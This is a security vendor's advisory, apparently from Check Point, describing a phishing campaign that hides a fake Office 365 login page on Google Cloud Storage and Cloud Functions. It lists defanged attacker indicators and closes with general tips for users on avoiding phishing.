Check
Point researchers warn and cite an example of a fast-growing trend in which
hackers are concealing phishing attacks on Google Cloud Services, making it far
more difficult for people to identify a phishing attack.
· Hackers upload PDF document to Google Drive , which
included a phishing page
· Phishing page requests Office365
credentials, leading to a real PDF report published by a renowned global
consulting firm
· Phishing page is hosted on Google
Cloud Storage, but malicious source code is traced to a Ukrainian IP address
Researchers at Check Point warn of a fast-growing trend in which hackers
are concealing phishing attacks on Google Cloud Platform (GCP). By using
advanced features in a well-known cloud storage service, hackers can better
disguise their malicious intentions, and not get caught by more traditional red
flags that people look for such as suspicious-looking domains or websites
without a HTTPS certificate. Below, Check Point researchers provide an example
of a hacker using GCP advanced features, Google Functions, to orchestrate a
sophisticated phishing attack, just like any other business.
Example: Hacker uses GCP Advanced Features to push Phishing Attack
This year, Check Point researchers came across an attack that started
with a PDF document uploaded to Google
Drive , which included a link to a phishing page.
The phishing page, hosted on storage.googleapis[.]com/asharepoint-unwearied-439052791/index.html,
asked the user to login with their Office 365 or organization e-mail. When a
user chooses one of the options, a pop-up window with the Outlook login page
appears. After the credentials were entered, the user is led to a real PDF
report published by a renowned global consulting firm. During all of these
stages, the user never gets suspicious since the phishing page is hosted on
Google Cloud Storage.
However, viewing the phishing page’s source code has
revealed that most of the resources are loaded from a website that belongs to
the attackers, prvtsmtp[.]com. The attackers started using Google Cloud
Functions, a service that allows the running of code in the cloud. In this
case, the resources in the phishing page were loaded from a Google Cloud
Functions instance without exposing the attackers’ own malicious domains.
Investigating prvtsmtp[.]com showed that it resolved to a Ukrainian IP address
(31.28.168[.]4). Many other domains related to this phishing attack resolved to
the same IP address, or to different ones on the same netblock.
Figure 1: Phishing Page asking user to login with their Office 365
credentials
Figure 2: PDF report published by a renowned global consulting firm
Figure 3: Phishing page’s malicious code
Quote: Lotem Finkelsteen, Check Point’s Manager of Threat Intelligence:
“Hackers are swarming around the cloud storage services that we rely on
and trust, making it much tougher to identify a phishing attack. Traditional
red flags of a phishing attack, such as look-alike domains or websites without
certificates, won’t help us much as we enter a potential cyber pandemic. Users
of Google Cloud Platform, even AWS and Azure users, should all beware of this
fast-growing trend, and learn how to protect themselves. It starts by thinking
twice about the files you receive from senders.”
How To Stay Protected
1. Beware of lookalike
domains, spelling errors in emails or websites, and unfamiliar email senders.
2. Be cautious with files
received via email from unknown senders, especially if they prompt for a
certain action you would not usually do.
3. Ensure you are ordering
goods from an authentic source. One way to do this is NOT to click on
promotional links in emails, and instead, Google your desired retailer and
click the link from the Google results page.
4. Beware of “special” offers.
“An exclusive cure for coronavirus for $150” is usually not a reliable or
trustworthy purchase opportunity.
5. Make sure you do not reuse
passwords between different applications and accounts.